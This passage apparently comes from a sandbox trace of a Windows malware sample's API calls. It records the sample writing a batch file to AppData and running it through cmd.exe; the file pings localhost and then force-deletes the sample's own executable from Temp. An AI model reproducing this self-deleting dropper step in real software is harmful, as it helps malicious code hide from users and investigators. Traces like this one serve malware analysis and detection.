dwFlags=0x0, lpMultiByteStr=0x1415158, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0117.175] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1415158, cbMultiByte=38, lpWideCharStr=0x140df0c, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0117.175] FreeResource (hResData=0x50d64c) returned 0 [0117.175] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0117.175] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x141515c, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0117.175] GetCurrentThreadId () returned 0xdf8 [0117.175] GetCurrentThreadId () returned 0xdf8 [0117.175] GetCurrentThreadId () returned 0xdf8 [0117.175] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x140de48, cbMultiByte=83, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 83 [0117.175] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x140de48, cbMultiByte=83, lpWideCharStr=0x134521c, cchWideChar=83 | out: lpWideCharStr="[RNDSTR].cmd\r\nping -n 3 localhost\r\ndel /f /q \"[SELF_NAME]\"\r\ndel /f /q \"[SELF_NAME]\"") returned 83 [0117.175] GetTickCount () returned 0x27cbd [0117.175] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbb8 | out: lpPerformanceCount=0x12fbb8*=17396429638) returned 1 [0117.175] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="p") returned 1 [0117.175] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="0") returned 1 [0117.175] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="m") returned 1 [0117.175] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="h") returned 1 [0117.175] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="d") returned 1 [0117.175] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="E") returned 1 [0117.175] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="5") returned 1 [0117.175] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="X") returned 1 [0117.175] CharUpperBuffW (in: lpsz="[RNDSTR].cmd", cchLength=0xc | out: lpsz="[RNDSTR].CMD") returned 0xc [0117.175] CharUpperBuffW (in: lpsz="[RNDSTR]", cchLength=0x8 | out: lpsz="[RNDSTR]") returned 0x8 [0117.175] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe", lpszShortPath=0x13431ec, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe") returned 0x30 [0117.175] CharUpperBuffW (in: lpsz="ping -n 3 localhost\r\ndel /f /q \"[SELF_NAME]\"\r\ndel /f /q \"[SELF_NAME]\"\r\n", cchLength=0x47 | out: lpsz="PING -N 3 LOCALHOST\r\nDEL /F /Q \"[SELF_NAME]\"\r\nDEL /F /Q \"[SELF_NAME]\"\r\n") returned 0x47 [0117.176] CharUpperBuffW (in: lpsz="[SELF_NAME]", cchLength=0xb | out: lpsz="[SELF_NAME]") returned 0xb [0117.176] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\p0mhdE5X.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\p0mhde5x.cmd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0117.176] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ping -n 3 localhost\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\"\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\"\r\n", cchWideChar=145, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 145 [0117.176] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ping -n 3 localhost\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\"\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\"\r\n", cchWideChar=145, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 145 [0117.176] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ping -n 3 localhost\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\"\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\"\r\n", cchWideChar=145, lpMultiByteStr=0x138fbd8, cbMultiByte=145, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ping -n 3 localhost\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\"\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\"\r\n", lpUsedDefaultChar=0x0) returned 145 [0117.176] WriteFile (in: hFile=0x110, lpBuffer=0x138fbd8*, nNumberOfBytesToWrite=0x91, lpNumberOfBytesWritten=0x12fb60, lpOverlapped=0x0 | out: lpBuffer=0x138fbd8*, lpNumberOfBytesWritten=0x12fb60*=0x91, lpOverlapped=0x0) returned 1 [0117.177] CloseHandle (hObject=0x110) returned 1 [0117.178] GetCurrentThreadId () returned 0xdf8 [0117.178] GetCurrentThreadId () returned 0xdf8 [0117.178] GetCurrentThreadId () returned 0xdf8 [0117.178] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\p0mhdE5X.cmd\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fc14*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fc04 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\p0mhdE5X.cmd\"", lpProcessInformation=0x12fc04*(hProcess=0x120, hThread=0x110, dwProcessId=0xe9c, dwThreadId=0xea0)) returned 1 [0117.180] CloseHandle (hObject=0x120) returned 1 [0117.180] CloseHandle (hObject=0x110) returned 1 [0117.180] GetCurrentThreadId () returned 0xdf8 [0117.180] GetCurrentThreadId () returned 0xdf8 [0117.180] GetCurrentThreadId () returned 0xdf8 [0117.180] GetCurrentThreadId () returned 0xdf8 [0117.180] GetCurrentThreadId () returned 0xdf8 [0117.180] GetCurrentThreadId () returned 0xdf8 [0117.180] GetCurrentThreadId () returned 0xdf8 [0117.180] GetCurrentThreadId () returned 0xdf8 [0117.180] GetCurrentThreadId () returned 0xdf8 [0117.180] GetCurrentThreadId () returned 0xdf8 [0117.180] GetCurrentThreadId () returned 0xdf8 [0117.180] GetCurrentThreadId () returned 0xdf8 [0117.180] GetCurrentThreadId () returned 0xdf8 [0117.180] GetCurrentThreadId () returned 0xdf8 [0117.180] GetCurrentThreadId () returned 0xdf8 [0117.180] GetCurrentThreadId () returned 0xdf8 [0117.180] GetCurrentThreadId () returned 0xdf8 [0117.180] GetCurrentThreadId () returned 0xdf8 [0117.180] GetCurrentThreadId () returned 0xdf8 [0117.180] GetCurrentThreadId () returned 0xdf8 [0117.180] GetCurrentThreadId () returned 0xdf8 [0117.180] GetCurrentThreadId () returned 0xdf8 [0117.180] GetCurrentThreadId () returned 0xdf8 [0117.180] GetCurrentThreadId () returned 0xdf8 [0117.180] GetCurrentThreadId () returned 0xdf8 [0117.180] GetCurrentThreadId () returned 0xdf8 [0117.180] GetCurrentThreadId () returned 0xdf8 [0117.180] WSACleanup () returned 0 [0117.249] FreeLibrary (hLibModule=0x77380000) returned 1 [0117.249] GetCurrentThreadId () returned 0xdf8 [0117.249] GetCurrentThreadId () returned 0xdf8 [0117.249] GetCurrentProcess () returned 0xffffffff [0117.249] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x400000, lpBuffer=0x12fbd8, dwLength=0x1c | out: lpBuffer=0x12fbd8*(BaseAddress=0x400000, AllocationBase=0x400000, AllocationProtect=0x40, RegionSize=0x11d000, State=0x1000, Protect=0x40, Type=0x20000)) returned 0x1c [0117.249] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x51d000, lpBuffer=0x12fbd8, dwLength=0x1c | out: lpBuffer=0x12fbd8*(BaseAddress=0x51d000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x3000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0117.249] GetCurrentThreadId () returned 0xdf8 [0117.249] GetCurrentThreadId () returned 0xdf8 [0117.249] ResetEvent (hEvent=0x88) returned 1 [0117.249] GetCurrentThreadId () returned 0xdf8 [0117.249] GetCurrentThreadId () returned 0xdf8 [0117.249] GetCurrentThreadId () returned 0xdf8 [0117.249] ResetEvent (hEvent=0x88) returned 1 [0117.249] GetCurrentThreadId () returned 0xdf8 [0117.249] GetCurrentThreadId () returned 0xdf8 [0117.249] GetCurrentThreadId () returned 0xdf8 [0117.249] GetCurrentThreadId () returned 0xdf8 [0117.249] GetCurrentThreadId () returned 0xdf8 [0117.249] GetCurrentThreadId () returned 0xdf8 [0117.249] GetCurrentThreadId () returned 0xdf8 [0117.249] GetCurrentThreadId () returned 0xdf8 [0117.249] GetCurrentThreadId () returned 0xdf8 [0117.249] GetCurrentThreadId () returned 0xdf8 [0117.249] GetCurrentThreadId () returned 0xdf8 [0117.249] GetCurrentThreadId () returned 0xdf8 [0117.249] GetCurrentThreadId () returned 0xdf8 [0117.249] CloseHandle (hObject=0x88) returned 1 [0117.249] CloseHandle (hObject=0x8c) returned 1 [0117.249] CloseHandle (hObject=0x84) returned 1 [0117.249] GetCurrentThreadId () returned 0xdf8 [0117.249] GetCurrentThreadId () returned 0xdf8 [0117.249] GetCurrentThreadId () returned 0xdf8 [0117.249] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.250] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.250] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.250] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.250] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.250] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.250] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.250] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.250] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.250] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.250] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.250] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.250] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.250] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.250] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.250] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.250] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.250] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.250] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.250] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.250] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.250] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.250] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.250] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.250] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.250] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.250] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.250] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.250] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.250] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.250] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.250] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.250] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.250] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.250] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.250] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.250] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.250] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.250] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.250] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.250] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.250] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.250] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.250] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.250] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.250] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.250] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.251] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.251] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.251] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.251] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.251] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.251] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.251] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.251] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.251] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.251] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.251] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.251] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.251] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.251] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.251] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.251] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.251] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.251] VirtualFree (lpAddress=0x1300000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0117.253] FreeLibrary (hLibModule=0x76910000) returned 1 [0117.253] LocalFree (hMem=0x214530) returned 0x0 [0117.253] FreeLibrary 